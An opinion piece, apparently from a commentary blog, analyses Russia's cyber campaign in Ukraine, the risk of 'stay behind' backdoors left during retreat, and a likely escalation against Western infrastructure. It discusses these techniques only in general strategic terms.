Is Russia about to pivot its cyber war in Ukraine?

With its land forces in retreat, is Russia about to pivot its cyber campaign in Ukraine?

Russia’s war in Ukraine has been a brutal disaster on many levels. In the war’s early stages some commentators expected cyber ‘shock and awe’ as part of Russia’s invasion. Because of the valiant efforts of Ukrainian cyber defenders, supported by nation states and large private organisations like Microsoft, the actual impact was somewhat less shocking and less awesome than expected. Some commentators have now suggested that Russia’s cyber warfare capabilities were as overstated as their conventional prowess. Under-estimating Russian cyber capabilities in this context is a mistake.

In the lead up to the invasion, Russia would have considered its range of cyber warfighting options from denying/disrupting Ukrainian critical infrastructure and defences, to deception and misinformation, to exploiting access for intelligence purposes. Russia clearly had a program of increasing its remote access ahead of the war, followed by some operations to deny/disrupt at a tactical level, however the long game Russia is more likely playing is to exploit its access for intelligence purposes, only selectively feeding snippets to the front line for tactical kinetic operations. Russia, like most countries exploiting cyber as a war fighting domain, will have a collection of highly prized zero-day exploits, but these will be reserved in favour of less exciting but still highly effective commodity operations like account takeovers and remote access attacks.

With Ukraine regaining territory, a complex set of opportunities and threats arise. While occupying Ukrainian terrain, Russian forces had direct physical access to swathes of Ukrainian networks. In their retreat, it wouldn’t be a surprise to see the Russians using cyber ‘stay behind’ tactics which can be as simple as leaving firewalls exposed, installing remote access backdoors and persistence tools like key loggers. There is an awful lot of harm Russia could do in this phase, particularly regarding remote persistence. This of course is even before you consider the insider risks – Russian spies left in Ukraine’s midst. Hopefully Ukraine’s civil and military authorities are including cyber hygiene as part of their battlefield clearance and broader processes in liberating territory.

Tactical mischief using Ukrainian infrastructure isn’t new in this war. In the early days of the occupation, we witnessed Ukrainian IPs appearing in numerous attacks around the world. Russian based attackers were likely using Ukrainian infrastructure that once upon a time would have been avoided or obfuscated, possibly to direct blame Ukraine’s way (and possibly just out of convenience). This spike may have also been influence by the well-publicised schism in Conti, a mixed Russian / Ukrainian hacking group that unsurprisingly fractured along nationalist lines.

In the coming weeks and months, with Russia’s ground war going badly, it will be no surprise if Russia ramps up its cyber warfare effort both in the primary theatre of Ukraine, but more broadly as it seeks to target Western supply chains to Ukraine, European energy infrastructure, sanctions enablers and the broader political support opposing Russia. Russia’s cyber warfare apparatus and its criminal proxies are still capable of launching large-scale symbolic attacks and retains its long-game capability of undermining democracy and rules-based-order and unity in the West.